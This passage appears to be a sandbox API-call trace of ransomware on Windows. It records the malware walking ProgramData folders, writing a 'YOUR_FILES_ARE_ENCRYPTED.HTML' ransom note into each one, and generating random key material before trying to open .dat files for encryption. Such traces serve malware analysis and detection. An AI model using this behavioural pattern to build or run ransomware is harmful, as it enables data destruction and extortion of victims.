ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x2c774c50, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x2c774c50, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.915] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x2c774c50, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x2c774c50, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0156.915] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.915] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0156.915] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\netframework\\breadcrumbstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0156.916] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.918] CloseHandle (hObject=0x4a8) returned 1 [0156.918] GetProcessHeap () returned 0x270000 [0156.919] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0156.919] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x2c774c50, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x2c774c50, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="BreadcrumbStore", cAlternateFileName="BREADC~1")) returned 0 [0156.919] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.919] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0156.920] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\netframework\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.920] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.922] CloseHandle (hObject=0x598) returned 1 [0156.922] GetProcessHeap () returned 0x270000 [0156.923] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.923] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f2fe55, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9f2fe55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Network", cAlternateFileName="")) returned 1 [0156.923] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network") returned 36 [0156.923] GetProcessHeap () returned 0x270000 [0156.923] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0156.923] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Network" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network" [0156.923] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*" [0156.923] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f2fe55, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9f2fe55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.924] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f2fe55, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9f2fe55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.924] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f2fe55, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x63053aed, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0156.924] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections") returned 48 [0156.924] GetProcessHeap () returned 0x270000 [0156.924] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0156.924] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections" [0156.924] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\*" [0156.924] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f2fe55, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x63053aed, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.924] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f2fe55, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x63053aed, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.924] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f2fe55, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x63053aed, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0156.924] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.924] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 78 [0156.925] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\network\\connections\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0156.925] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.927] CloseHandle (hObject=0x4a8) returned 1 [0156.928] GetProcessHeap () returned 0x270000 [0156.928] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0156.929] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x5ca238d5, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ca238d5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Downloader", cAlternateFileName="DOWNLO~1")) returned 1 [0156.929] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader") returned 47 [0156.929] GetProcessHeap () returned 0x270000 [0156.929] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0156.929] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader" [0156.929] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*" [0156.929] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x5ca238d5, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ca238d5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.929] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x5ca238d5, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ca238d5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.929] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x5c9fd775, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5c9fd775, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ca238d5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0x0, dwReserved1=0x60, cFileName="qmgr0.dat", cAlternateFileName="")) returned 1 [0156.929] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat") returned 57 [0156.929] lstrcmpW (lpString1="qmgr0.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.929] PathFindExtensionW (pszPath="qmgr0.dat") returned=".dat" [0156.929] lstrlenW (lpString=".dat") returned 4 [0156.929] PathFindExtensionW (pszPath="qmgr0.dat") returned=".dat" [0156.929] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.930] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.930] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x5ca238d5, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5ca238d5, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ca238d5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0x0, dwReserved1=0x60, cFileName="qmgr1.dat", cAlternateFileName="")) returned 1 [0156.930] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat") returned 57 [0156.930] lstrcmpW (lpString1="qmgr1.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.930] PathFindExtensionW (pszPath="qmgr1.dat") returned=".dat" [0156.930] lstrlenW (lpString=".dat") returned 4 [0156.930] PathFindExtensionW (pszPath="qmgr1.dat") returned=".dat" [0156.930] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.930] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.930] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x5ca238d5, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5ca238d5, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ca238d5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0x0, dwReserved1=0x60, cFileName="qmgr1.dat", cAlternateFileName="")) returned 0 [0156.930] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.931] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 77 [0156.931] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0156.931] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.934] CloseHandle (hObject=0x4a8) returned 1 [0156.934] GetProcessHeap () returned 0x270000 [0156.935] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0156.935] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x5ca238d5, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ca238d5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Downloader", cAlternateFileName="DOWNLO~1")) returned 0 [0156.935] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.935] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 66 [0156.935] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\network\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.936] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.938] CloseHandle (hObject=0x598) returned 1 [0156.939] GetProcessHeap () returned 0x270000 [0156.940] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.940] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1934ad10, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x1934ad10, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x1934ad10, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Office", cAlternateFileName="")) returned 1 [0156.940] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Office") returned 35 [0156.940] GetProcessHeap () returned 0x270000 [0156.940] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0156.940] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Office" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Office") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Office" [0156.940] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Office", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\*" [0156.940] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1934ad10, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x1934ad10, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x1934ad10, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.941] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1934ad10, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x1934ad10, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x1934ad10, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.941] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1934ad10, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x1934ad10, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x1934ad10, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ClickToRunPackageLocker", cAlternateFileName="CLICKT~1")) returned 1 [0156.941] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\ClickToRunPackageLocker") returned 59 [0156.941] lstrcmpW (lpString1="ClickToRunPackageLocker", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.941] PathFindExtensionW (pszPath="ClickToRunPackageLocker") returned="" [0156.941] lstrlenW (lpString="") returned 0 [0156.941] PathFindExtensionW (pszPath="ClickToRunPackageLocker") returned="" [0156.941] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1934ad10, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x1934ad10, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x1934ad10, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ClickToRunPackageLocker", cAlternateFileName="CLICKT~1")) returned 0 [0156.941] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.941] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 65 [0156.941] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\office\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.942] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.944] CloseHandle (hObject=0x598) returned 1 [0156.944] GetProcessHeap () returned 0x270000 [0156.945] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.945] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c5a92b0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xd2cc8ee0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xd2cc8ee0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0156.945] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform") returned 61 [0156.945] GetProcessHeap () returned 0x270000 [0156.945] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0156.945] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform" [0156.945] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*" [0156.946] FindFirstFileW (in: 